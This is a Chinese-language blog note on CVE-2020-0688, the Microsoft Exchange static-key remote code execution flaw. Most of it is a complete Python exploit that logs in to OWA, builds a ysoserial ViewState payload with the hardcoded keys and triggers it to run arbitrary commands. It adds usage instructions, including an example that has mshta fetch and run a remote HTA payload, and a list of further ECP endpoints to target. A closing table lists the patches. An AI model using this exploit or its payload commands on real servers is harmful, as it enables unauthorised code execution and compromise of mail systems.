CVE-2020-0688-微軟Exchange伺服器靜態密鑰缺陷導致遠程程式碼EXP
- 2020 年 3 月 6 日
- 筆記
概述
在2020年2月發布的最新微軟月度修補程式程式中,Microsoft發布了一個重要的修補程式程式,以修復Microsoft Exchange伺服器中的遠程程式碼執行漏洞。該漏洞由一位匿名研究人員報告給我們,影響Microsoft Exchange伺服器的所有受支援版本,在2月的修補程式中實現修復。
影片地址:https://youtu.be/7d_HoQ0LVy8
最初,Microsoft表示該漏洞是由於記憶體損壞漏洞引起的,並且可以通過將特製的電子郵件發送到易受攻擊的Exchange伺服器的方式利用這一漏洞。此後,Microsoft已經將Write-up的內容進行修改,目前表示該漏洞是由於Exchange Server在安裝時未能正確創建唯一的加密密鑰所導致的。
漏洞利用:
# encoding: UTF-8 import requests import readline import argparse import re import sys import os import urllib3 from urllib.parse import urlparse from urllib.parse import quote urllib3.disable_warnings() ysoserial_path = os.path.abspath(os.path.dirname(__file__))+"/ysoserial-1.32/" session = requests.Session() def get_value(url, user, pwd): print("[*] Tring to login owa...") tmp = urlparse(url) base_url = "{}://{}".format(tmp.scheme, tmp.netloc) paramsPost = {"password": ""+pwd+"", "isUtf8": "1", "passwordText": "", "trusted": "4", "destination": ""+url+"", "flags": "4", "forcedownlevel": "0", "username": ""+user+""} headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0", "Connection": "close", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Cookie": "PrivateComputer=true; PBack=0"} cookies = {"PBack": "0", "PrivateComputer": "true"} login_url = base_url + '/owa/auth.owa' print("[+] Login url: {}".format(login_url)) try: login = session.post(login_url, data=paramsPost, headers=headers, verify=False, timeout=30) print("[*] Status code: %i" % login.status_code) if "reason=" in login.text or "reason=" in login.url and "owaLoading" in login.text: print("[!] Login Incorrect, please try again with a different account..") # sys.exit(1) #print(str(response.text)) except Exception as e: print("[!] login error , error: {}".format(e)) sys.exit(1) print("[+] Login successfully! ") try: print("[*] Tring to get __VIEWSTATEGENERATOR...") target_url = "{}/ecp/default.aspx".format(base_url) new_response = session.get(target_url, verify=False, timeout=15) view = re.compile( 'id="__VIEWSTATEGENERATOR" value="(.+?)"').findall(str(new_response.text))[0] print("[+] Done! __VIEWSTATEGENERATOR:{}".format(view)) except: view = "B97B4E27" print("[*] Can't get __VIEWSTATEGENERATOR, use default value: {}".format(view)) try: print("[*] Tring to get ASP.NET_SessionId....") key = session.cookies['ASP.NET_SessionId'] print("[+] Done! ASP.NET_SessionId: {}".format(key)) except Exception as e: key = None print("[!] Get ASP.NET_SessionId error, error: {} n[*] Exit..".format(e)) return view, key, base_url def ysoserial(cmd): cmd = ysoserial_path+cmd r = os.popen(cmd) res = r.readlines() return res[-1] def main(): parser = argparse.ArgumentParser() parser.add_argument("-s", "--server", required=True, help="ECP Server URL Example: http://ip/owa") parser.add_argument("-u", "--user", required=True, help="login account Example: domain\user") parser.add_argument("-p", "--password", required=True, help="Password") parser.add_argument("-c", "--cmd", help="Command u want to execute", required=True) parser.add_argument("-e", "--encrypt", help="Encrypt the payload", action='store_true',default=False) args = parser.parse_args() url = args.server print("[*] Start to exploit..") user = args.user pwd = args.password command = args.cmd view, key, base_url = get_value(url, user, pwd) if key is None: key = 'test' sys.exit(1) ex_payload = """ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "{}" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="{}" --viewstateuserkey="{}" --islegacy """.format(command,view,key) if args.encrypt: re_payload = ex_payload + ' --decryptionalg="3DES" --decryptionkey="E9D2490BD0075B51D1BA5288514514AF" --isencrypted' else: re_payload = ex_payload + " --isdebug" print("n"+re_payload) out_payload = ysoserial(re_payload) if args.encrypt: final_exp = "{}/ecp/default.aspx?__VIEWSTATEENCRYPTED=&__VIEWSTATE={}".format(base_url, quote(out_payload)) else: final_exp = "{}/ecp/default.aspx?__VIEWSTATEGENERATOR={}&__VIEWSTATE={}".format(base_url, view, quote(out_payload)) print("n[+] Exp url: {}".format(final_exp)) print("n[*] Auto trigger payload..") status = session.get(final_exp,verify=False,timeout=15) if status.status_code==500: print("[*] Status code: %i, Maybe success!" % status.status_code) if __name__ == "__main__": main()
利用說明:
python3 CVE-2020-0688_EXP.py -h usage: CVE-2020-0688_EXP.py [-h] -s SERVER -u USER -p PASSWORD -c CMD [-e] optional arguments: -h, --help show this help message and exit -s SERVER, --server ECP Server URL Example: http://ip/owa -u USER, --user USER login account Example: domainuser -p PASSWORD, --password PASSWORD -c CMD, --cmd CMD Command u want to execute -e, --encrypt Encrypt the payload 例 python CVE-2020-0688_EXP.py -s https://mail.x.com/ -u [email protected] -p passwd -c "mshta http://1.1.1.1/test.hta"
其他可用路徑:
/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27 /ecp/PersonalSettings/HomePage.aspx?showhelp=false&__VIEWSTATEGENERATOR=1D01FD4E /ecp/PersonalSettings/HomePage.aspx?showhelp=false&__VIEWSTATEGENERATOR=1D01FD4E /ecp/Organize/AutomaticReplies.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0 /ecp/RulesEditor/InboxRules.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0 /ecp/Organize/DeliveryReports.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0 /ecp/MyGroups/PersonalGroups.aspx?showhelp=false&__VIEWSTATEGENERATOR=A767F62B /ecp/MyGroups/ViewDistributionGroup.aspx?pwmcid=1&id=38f4bec5-704f-4272-a654-95d53150e2ae&ReturnObjectType=1&__VIEWSTATEGENERATOR=321473B8 /ecp/Customize/Messaging.aspx?showhelp=false&__VIEWSTATEGENERATOR=9C5731F0 /ecp/Customize/General.aspx?showhelp=false&__VIEWSTATEGENERATOR=72B13321 /ecp/Customize/Calendar.aspx?showhelp=false&__VIEWSTATEGENERATOR=4AD51055 /ecp/Customize/SentItems.aspx?showhelp=false& __VIEWSTATEGENERATOR=4466B13F /ecp/PersonalSettings/Password.aspx?showhelp=false&__VIEWSTATEGENERATOR=59543DCA /ecp/SMS/TextMessaging.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0 /ecp/TroubleShooting/MobileDevices.slab?showhelp=false&__VIEWSTATEGENERATOR=FD338EE0 /ecp/Customize/Regional.aspx?showhelp=false&__VIEWSTATEGENERATOR=9097CD08 /ecp/MyGroups/SearchAllGroups.slab?pwmcid=3&ReturnObjectType=1__VIEWSTATEGENERATOR=FD338EE0 /ecp/Security/BlockOrAllow.aspx?showhelp=false&__VIEWSTATEGENERATOR=362253EF
更新修復
您可以訪問所有受支援的Microsoft Exchange Server版本的安全更新說明,並從下表中下載它們:
|
產品 |
文章 |
下載 |
|---|---|---|
|
Microsoft Exchange Server 2010 Service Pack 3更新匯總30 |
4536989 |
安全更新 |
|
Microsoft Exchange Server 2013累積更新23 |
4536988 |
安全更新 |
|
Microsoft Exchange Server 2016累積更新14 |
4536987 |
安全更新 |
|
Microsoft Exchange Server 2016累積更新15 |
4536987 |
安全更新 |
|
Microsoft Exchange Server 2019累積更新3 |
4536987 |
安全更新 |
|
Microsoft Exchange Server 2019累積更新4 |
4536987 |
安全更新 |
